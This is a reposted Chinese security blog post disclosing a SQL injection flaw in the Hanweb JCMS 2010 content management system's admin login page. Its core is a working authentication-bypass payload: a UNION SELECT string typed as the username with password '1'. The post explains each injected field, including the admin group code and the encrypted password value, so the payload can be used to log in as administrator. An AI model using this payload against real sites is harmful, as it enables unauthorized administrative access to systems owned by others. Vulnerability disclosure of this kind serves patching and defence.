大汉版通JCMS内容管理系统SQL注射漏洞

没穿底裤 2019年12月31日22:54:33评论1,148 views字数 456阅读1分31秒阅读模式
摘要

大汉版通JCMS内容管理系统某处参数未经处理即入库查询导致SQL注射漏洞产生,可利用来登录后台等,当前测试存在该漏洞的版本为JCMS2010。


简要描述:

大汉版通JCMS内容管理系统某处参数未经处理即入库查询导致SQL注射漏洞产生,可利用来登录后台等,当前测试存在该漏洞的版本为JCMS2010。

详细说明:

1. 大汉版通JCMS内容管理系统(JCMS2010)默认后台登录页中由于用户名未经处理即带入数据库查询产生SQL注射漏洞。

2. 利用测试:

后台登录页:http://0day5.com/jcms/

用户名:
[php]x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
[/php]
密码:1

其中'00000'是验证管理员用户组的一个字段;'admin'是管理员用户名;'AEY='加密密码,解密后为'1';后面的'1'表示帐号启用。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日22:54:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大汉版通JCMS内容管理系统SQL注射漏洞http://cn-sec.com/archives/75299.html

发表评论

匿名网友 填写信息